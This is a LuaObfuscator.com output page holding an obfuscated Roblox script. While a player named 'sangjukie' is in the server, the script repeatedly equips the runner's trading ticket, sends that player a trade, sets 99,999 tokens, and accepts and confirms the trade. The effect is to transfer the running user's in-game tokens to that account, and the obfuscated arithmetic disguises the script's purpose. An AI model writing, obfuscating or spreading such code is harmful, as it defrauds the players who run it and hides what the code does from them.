

    << Home

Download

--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0="sangjukie";local v1=1395 -(1103 + 282) ;local v2=7;local v3=5 + 0 ;local v4=355 -(87 + 263) ;local v5=100179 -(67 + 113) ;local v6=game:GetService("Players");local v7=game:GetService("ReplicatedStorage");local v8=v6.LocalPlayer;local v9=v7:WaitForChild("GameEvents"):WaitForChild("TradeEvents");local v10=false;local function v11() local v16=v8.Character or v8.CharacterAdded:Wait() ;local v17=v16:WaitForChild("Humanoid");for v26,v27 in ipairs(v8.Backpack:GetChildren()) do if (v27:IsA("Tool") and v27.Name:find("Trading Ticket")) then v17:EquipTool(v27);break;end end end local function v12() local v18=0 + 0 ;local v19;local v20;while true do if ((2 -1)==v18) then v20=v19:FindFirstChildOfClass("Humanoid");if v20 then v20:UnequipTools();end break;end if (v18==(0 + 0)) then v19=v8.Character;if  not v19 then return;end v18=3 -2 ;end end end local function v13() local v21=0 -0 ;while true do if (v21==(0 + 0)) then while v10 do local v29=v6:FindFirstChild(v0);if  not v29 then v10=false;break;end task.wait(962 -(802 + 150) );v11();print("[AUTO TRADE] Sending request ->",v29.Name);v9.SendRequest:FireServer(v29);task.wait(v1);if  not v10 then break;end print("[AUTO TRADE] Setting tokens:",v5);v9.SetTokens:FireServer(v5);task.wait(v2);if  not v10 then break;end print("[AUTO TRADE] Accepting trade");v9.Accept:FireServer();task.wait(v3);if  not v10 then break;end print("[AUTO TRADE] Confirming trade");v9.Confirm:FireServer();task.wait(2 -1 );v12();task.wait(v4);end print("[AUTO TRADE] STOPPED");break;end end end local function v14() local v22=0 + 0 ;while true do if (v22==(0 -0)) then if v10 then return;end v10=true;v22=1 + 0 ;end if (v22==1) then print("[AUTO TRADE] START");task.spawn(v13);break;end end end local function v15() local v23=997 -(915 + 82) ;while true do if (v23==(18 -(10 + 8))) then v10=false;print("[AUTO TRADE] STOP");break;end end end if v6:FindFirstChild(v0) then v14();end v6.PlayerAdded:Connect(function(v24) if (v24.Name==v0) then v14();end end);v6.PlayerRemoving:Connect(function(v25) if (v25.Name==v0) then v15();end end);

    [22:30:44.875]: Obfuscation finished!
    [22:30:43.222]: Applying obfuscation 'pre-3'
    [22:30:23.457]: Initialized Console!

Community
All Actions
Obfuscation
Dystropic Malevolence Chaotic Evil Chaotic Good OBFUSCATE v1 OBFUSCATE (old) Basic Good Basic Minimal Beautify Make Sus
Miscellaneous
Experimental
